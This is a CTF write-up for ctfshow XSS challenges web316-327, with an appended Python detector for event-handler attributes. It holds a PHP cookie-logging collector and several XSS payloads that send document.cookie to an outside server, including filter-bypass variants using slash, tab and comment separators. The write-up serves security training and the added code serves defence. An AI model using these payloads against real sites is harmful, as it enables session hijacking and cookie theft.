ctfshow_xss_wp
source link: https://charmersix.icu/2022/05/14/ctfshow_xss_wp/
Cross-site scripting gets a thorough workout in this set of challenges.
web316
Cross-site scripting, reflected XSS in this case. I used my own server here; plenty of people use one of the public XSS platforms instead, and they are all much the same (http://xsscom.com/, for example, loads fairly quickly).
I used my own server and put this script on it:
<?php
$cookie = $_GET['1'];
$log = fopen("flag.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>
I would recommend not naming the file xss: I named it xss at first, and later challenges filter the string xss.
payload:
<script>window.location.href='http://自己服务器IP/a.php?1='+document.cookie</script>
window.location.href
can be read as "navigate to the URL assigned to href"; for details see https://www.cnblogs.com/Qian123/p/5345298.html#_label3
document.cookie
reads (or writes) the document's cookies; here it is used to read the target's cookies so they can be sent out. For details see https://www.runoob.com/jsref/prop-doc-cookie.html
web317-319
One trick covers all of these. The filters differ from level to level (img, script and xss are among the filtered strings),
but the payload is:
<body onload="document.location.href='http://IP/a.php?1='+document.cookie"></body>
web320-web326
Spaces are filtered, but a tab, a slash (/) or /**/ all work as the separator instead,
so the payload:
<body/onload="document.location.href='http://ip/a.php?1='+document.cookie"></body>
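The web320-326 payload survives a space-only filter because the HTML tokenizer accepts any ASCII whitespace or a slash between a tag name and an attribute name. As an added example that is not part of this writeup, here is a Python check (function names and the ATTACKER-HOST placeholder are my own) that finds on* event-handler attributes the way a browser would see them, so a server-side validator or a review of stored input is not fooled by the separator trick:

```python
import re
# HTML tokenizer rule behind the web320-326 bypass: between a tag name and an
# attribute name the browser accepts any ASCII whitespace OR a '/', so a filter
# that only blocks the space character is not a defence.
SEPARATORS = "\t\n\f\r /"
WHITESPACE = "\t\n\f\r "
TAG_OPEN = re.compile(r"<([A-Za-z][^\t\n\f\r />]*)")

def event_handler_attrs(markup: str) -> list:
    """Return (tag, attr) pairs for every on* attribute, walking start tags like the tokenizer."""
    found, i, n = [], 0, len(markup)
    while True:
        m = TAG_OPEN.search(markup, i)
        if not m:
            return found
        tag, i = m.group(1).lower(), m.end()
        while i < n and markup[i] != ">":
            while i < n and markup[i] in SEPARATORS:  # skip any separator run
                i += 1
            j = i
            while j < n and markup[j] not in SEPARATORS + "=>":
                j += 1
            name, i = markup[i:j].lower(), j
            if i < n and markup[i] == "=":  # consume the quoted or bare value
                i += 1
                while i < n and markup[i] in WHITESPACE:
                    i += 1
                if i < n and markup[i] in "\"'":
                    end = markup.find(markup[i], i + 1)
                    i = n if end == -1 else end + 1
                else:
                    while i < n and markup[i] not in WHITESPACE + ">":
                        i += 1
            if len(name) > 2 and name.startswith("on"):
                found.append((tag, name))
        i += 1  # step past '>' and look for the next start tag

# Constructed samples: the page's body/onload payload with a space, '/', tab
# and '/**/' as separator, plus a benign tag; the host is a placeholder.
STEAL = "document.location.href='http://ATTACKER-HOST/a.php?1='+document.cookie"
SAMPLES = {
    "space": f'<body onload="{STEAL}"></body>',
    "slash": f'<body/onload="{STEAL}"></body>',
    "tab": f'<body\tonload="{STEAL}"></body>',
    "comment": f'<body/**/onload="{STEAL}"></body>',
    "benign": '<a href="/sale" title="on sale today">offer</a>',
}

def scan_samples() -> dict:  # sample name -> handlers a browser would run
    return {k: event_handler_attrs(v) for k, v in SAMPLES.items()}
```

Every payload variant reports the same ("body", "onload") hit while the benign tag reports nothing; a filter that only looks for a space before "onload" would pass three of the four.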
web327
Now we come to stored XSS, and the difficulty goes up.